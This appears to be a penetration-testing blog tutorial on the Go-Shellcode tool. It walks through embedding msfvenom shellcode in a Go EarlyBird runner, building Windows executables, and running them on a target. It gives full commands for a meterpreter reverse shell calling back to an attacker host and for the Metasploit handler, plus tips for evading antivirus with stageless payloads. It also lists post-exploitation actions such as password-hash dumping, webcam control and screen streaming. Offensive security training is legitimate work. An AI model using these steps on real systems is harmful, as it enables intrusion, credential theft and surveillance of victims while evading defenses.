Getting Offensive with Golang (Part 2)

This is a continuation of the previous post on using Golang in Pentesting

In Part 2 of Pentesting with Golang, we will look at Go-Shellcode. A feature packed and versatile shellcode tool.

Go-Shellcode

Tool Author: Ne0nd0g
Tool GitHub: https://github.com/Ne0nd0g/go-shellcode

Go-Shellcode is a great collection of shellcode runners and utilities, written by Ne0nd0g, the creator of the Merlin C2. Go-Shellcode is nice, because it allows you to run exploit shellcode in Go, using various API call techniques. It’s fast, works great against Anti-Virus, and allows you to use any hex encoded shellcode as a payload, especially ones created with MSFvenom. 

Make sure you have Go installed on your Kali system, and then just enter:

• git clone https://github.com/Ne0nd0g/go-shellcode.git

Once installed, you know have multiple ways to create shellcode. Navigate to the ‘go-shellcode/cmd’ directory, and you will see a list of shellcode delivery techniques, one per folder. Pick one of the techniques – see the tool GitHub page for descriptions for each one.

Then just modify the main.go file in the corresponding subdirectory, inserting the shellcode that you want to run. Each technique comes default with a “Pop Calculator” shellcode string.

As seen below:

Of course, you don’t have to stick with the Popup Calculator shellcode – though I highly recommend using that on your first attempt. You can use any hex Shellcode that you want, using the following procedure. 

1. Create your shellcode with MsfVenom, using a filetype (-f) of “hex”.
2. Copy and paste it into the code, replacing the existing shellcode DecodeString number string.
3. Next build the Go file using the instructions for the individual technique, listed on the GitHub page. When finished, a Windows .exe file will appear in the main directory.
4. If it is a remote shell, just make sure you have Metasploit multi-handler running to catch the call back.
5. Finally, copy the shellcode file to the target and run it.

The code layout is very nice, it makes it very easy to pick the API technique you want, then just generate your desired shellcode and drop it in. 

The EarlyBird gets the Shell

Let’s run through one of the techniques together. We will use the latest one, Go-Shellcode EarlyBird. To try it out with the default “pop calculator” shellcode, just enter the following from the main “go-shellcode” directory.

• export GOOS=windows GOARCH=amd64;go build -o popcalc.exe cmd/EarlyBird/main.go

This will create the file, “popcalc” in the go-shellcode directory. Just copy this file to our Windows server target and run it. Windows calculator will open – You have successfully exploited a system with the dreaded calculator exploit! If you have never heard about “Popping Calc”, it is a fairly popular pentester joke.

Alright, let’s use a different shellcode. It would be nice to pop up a messagebox on the target instead of a calculator. We can do this easily with Msfvenom and the messagebox payload.

First, generate the hex payload:

• In a Kali Linux Terminal, enter, “msfvenom -p windows/x64/messagebox -f hex”

Use your favorite editor to open the main.go file in the EarlyBird directory. Then just copy and paste the hex code into the main.go program, replacing the existing popcalc hex code. Copy the entire HEX code, and paste it over (replacing) the existing HEX shellcode string.

As indicated below:

// Pop Calc Shellcode (x64)

            shellcode, errShellcode := hex.DecodeString(“[Place New Hex String HERE]”)

            if errShellcode != nil {

Generate the code again:

• export GOOS=windows GOARCH=amd64;go build -o message.exe cmd/EarlyBird/main.go

Copy the new Message.exe file to the Windows target and run it.

Proof of exploit – Nice! Okay, that is a pretty generic message, let’s see if we can improve on it. Let’s take a look at the ‘messagebox’ payload.

• Open another terminal and start Metasploit (msfconsole) 
• Type “info windows/x64/messagebox”

Here we see information about the payload, including the Text and Title. This info is pretty generic, so let’s change it. We can set the options on the fly when we generate the payload with msfvenom.

• msfvenom -p windows/x64/messagebox TEXT=”Something Evil this Way Comes” TITLE=”HackerBox” -f hex

We set the TEXT and TITLE variables right from the msfvenom command. Let’s see if it worked!

• Copy and paste the new shellcode into the main.go program
• Generate the code, call it “Messagebox2.exe”
• Run it on our Windows target:

Very nice! In some Pentest or Red Team engagements, you just need proof of compromise, so this might work nicely. Let’s take it a step further and use the Go program to create a Meterpreter remote shell.

First, we need to generate the shellcode with msfvenom. Let’s try a different reverse shell, just to change things up a little, “reverse_winhttp”.

• msfvenom -p windows/x64/meterpreter/reverse_winhttp LHOST=”[Kali_IP_Address]” -f hex

Yes, in case you were wondering, you can run msfvenom directly in Metasploit.

• Copy and paste the hex code into main.go, totally replacing the previous shellcode
• Generate it, let’s use a name of ‘winhttp.exe’
• export GOOS=windows GOARCH=amd64;go build -o winhttp.exe cmd/EarlyBird/main.go

Before we run it, we need to start a Multi-handler in Metasploit to catch and respond to the call out.

In Metasploit:

• use multi/handler
• set payload windows/x64/meterpreter/reverse_winhttp
• set LHOST [Kali_IP]
• exploit -j

Now copy the winhttp.exe file to your Windows target and run it and we get a remote shell!

Type, “help” to see available meterpreter commands. We can upload or download files, even grab a screenshot or control the webcam. If the remote user is an administer, we can run the meterpreter command, “Hashdump” to grab the user password hashes.

“Screenshare” is a newer Meterpreter command. Running this opens a browser on Kali and forces the remote system to live stream the desktop to the Kali system!

I use Go-Shellcode EarlyBird a lot, it is one of my favorite shells. Remember too, EarlyBird is just one of the APIs that you can use, Go-Shellcode has several! Very recently, AV is catching the staged meterpreter shell even using EarlyBird. What is being caught though, is when the stager calls back to Metasploit and downloads the second part of the shell – the solution? Just use the stageless Meterpreter (windows/x64/meterpreter_reverse_tcp) payload shell! It’s extremely long, but works great in Early Bird!

I’ll leave this up to the reader to try, but this is the multi-handler to catch it:

Want to learn more about how to use Go coding in offensive security? I highly recommend the following two books:

• “Security with Go” by John Daneil Leon
• “Black Hat Go” by Tom Steele, Chris Patten, and Dan Kottmann

Both books are exceptional and walk you through custom coding many security tools. If you are newer to coding with Go, I recommend starting with “Security with Go”. I think the examples are much easier to follow.

The majority of this article is a direct adaptation of a Chapter from one of my latest books. If you liked this article, and want to learn a lot more about the Techniques, Tactics and Procedures (TTPs) that hackers use, in a step-by-step lab environment – then check out my new book:

• “Advanced Security Testing with Kali Linux”, by Daniel W. Dieterle

 Available on Amazon!